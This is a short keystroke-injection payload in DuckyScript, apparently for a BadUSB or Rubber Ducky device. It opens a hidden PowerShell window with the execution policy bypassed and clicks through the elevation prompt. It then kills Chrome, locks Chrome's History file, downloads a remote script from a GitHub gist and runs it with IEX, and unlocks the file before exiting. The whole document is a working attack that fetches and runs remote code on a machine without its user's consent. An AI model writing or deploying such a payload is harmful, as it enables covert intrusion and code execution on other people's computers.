DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -W Hidden -Exec Bypass
CTRL SHIFT ENTER
DELAY 1500
LEFT
ENTER
DELAY 500
STRING taskkill /F /IM chrome.exe /T; 
DELAY 200
STRING $h = "$env:LocalAppData\Google\Chrome\User Data\Default\History"; attrib +r $h;
DELAY 200
STRING IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/Sebisname/0ec07082c5a2bc753841c4af021afad4/raw/b631f3a71faa52023fed9c5bc67484551eae94dc/Secret%2520Gist');
DELAY 500
STRING attrib -r $h;
DELAY 200
STRING exit
ENTER
